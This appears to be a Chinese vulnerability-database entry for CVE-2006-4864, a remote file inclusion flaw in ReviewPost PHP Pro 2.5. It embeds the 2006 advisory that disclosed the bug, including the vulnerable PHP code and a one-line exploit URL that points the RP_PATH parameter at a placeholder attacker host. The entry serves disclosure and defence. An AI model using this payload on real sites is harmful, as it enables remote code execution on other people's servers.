All Enthusiast ReviewPost 'index.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193455 漏洞类型 未知
发布时间 2006-09-19 更新时间 2006-09-19
CVE编号 CVE-2006-4864 CNNVD-ID CNNVD-200609-343
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/84182
https://cxsecurity.com/issue/WLB-2006090131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-343
|漏洞详情
AllEnthusiastReviewPost的index.php中存在PHP远程文件包含漏洞,远程攻击者可以通过RP_PATH参数中的URL执行任意PHP代码。
|漏洞EXP
#############################Solpot Crew Community##############################

#

#  ReviewPost 2.5 (RP_PATH) Remote File Inclusion

#

#  Donwload File : http://3-bius.com/ReviewPost.zip

#

########################################################################
#########

#

#

#       Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)

#

#       contact: bius (at) mac (dot) com [email concealed]

#

#       Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt

#

########################################################################
########

#

#

#      Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry

#              imam26_it,ant1casper(tolong tambahin ya)

#              #nyubi , #hitamputih @dalnet

#              and all member solpotcrew community

#              http://www.nyubicrew.org/forum/

#              especially thx to Solpot @ nyubi (at) dal (dot) net [email concealed]

#

########################################################################
#######

Input passed to the "RP_PATH" is not properly verified

before being used to include files. This can be exploited to execute

arbitrary PHP code by including files from local or external resources.

code from index.php

<?php

require "pp-inc.php";

if ( is_numeric($argv[0]) ) {

header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}");

exit;

}

require "$RP_PATH/languages/$rplang/index.php";

require "$RP_PATH/login-inc.php";

if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {

diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );

exit;

}

?>

nb : others file has vulnerable too :)

exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil

########################################################################
#####

######################################E.O.F#############################
#####
|受影响的产品
All Enthusiast Inc ReviewPost PHP Pro 2.5
|参考资料

来源:XF
名称:reviewpostphppro-rppath-file-include(28992)
链接:http://xforce.iss.net/xforce/xfdb/28992
来源:BUGTRAQ
名称:20060915SolpotCrewAdvisory#11-ReviewPost2.5(RP_PATH)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/446106/100/0/threaded
来源:MISC
链接:http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
来源:VUPEN
名称:ADV-2006-3658
链接:http://www.frsirt.com/english/advisories/2006/3658
来源:SECUNIA
名称:21971
链接:http://secunia.com/advisories/21971
来源:SREASON
名称:1603
链接:http://securityreason.com/securityalert/1603